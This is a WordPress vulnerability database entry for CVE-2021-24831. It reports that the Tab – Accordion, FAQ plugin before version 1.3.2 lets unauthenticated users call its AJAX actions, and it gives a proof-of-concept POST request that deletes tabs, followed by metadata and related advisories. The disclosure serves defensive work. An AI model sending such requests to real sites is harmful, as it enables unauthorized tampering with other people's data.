Tab – Accordion, FAQ < 1.3.2 – Unauthenticated AJAX Calls | CVE 2021-24831 | Plugin Vulnerabilities

Description

All AJAX actions of the plugin are available to both unauthenticated and authenticated users, allowing unauthenticated attackers to modify various data in the plugin, such as add/edit/delete arbitrary tabs.

v1.3.0 added CSRF checks, however authorisation was still missing and has been added in 1.3.2

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 42
Connection: close

action=RW_Tabs_Man_Delete_Opt&Deleted_ID=4

Affects Plugins

Fixed in 1.3.2

References

CVE

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Brandon Roldan

Submitter

Brandon Roldan

Submitter twitter

Verified

Yes

WPVDB ID

75ed9f5f-e091-4372-a6cb-57958ad5f900

Timeline

Publicly Published

2021-12-06 (about 2 years ago)

Added

2021-12-06 (about 2 years ago)

Last Updated

2022-04-11 (about 2 years ago)

Other

Published

Title

Published

2024-03-20

Title

WooCommerce Cloak Affiliate Links < 1.0.34 - Missing Authorization to Unauthenticated Permalink Modification

Published

2021-07-12

Title

Frontend File Manager < 18.3 - Unauthenticated Arbitrary Post Deletion

Published

2021-10-19

Title

Download Plugin < 1.6.1 - Subscriber+ Arbitrary Plugin Activation

Published

2021-10-05

Title

Batch Cat <= 0.3 - Subscriber+ Arbitrary Categories Add/Set/Delete to Posts

Published

2022-01-03

Title

TrustMate.io integration for WooCommerce < 1.7.1 - Subscriber+ Arbitrary Blog Option Update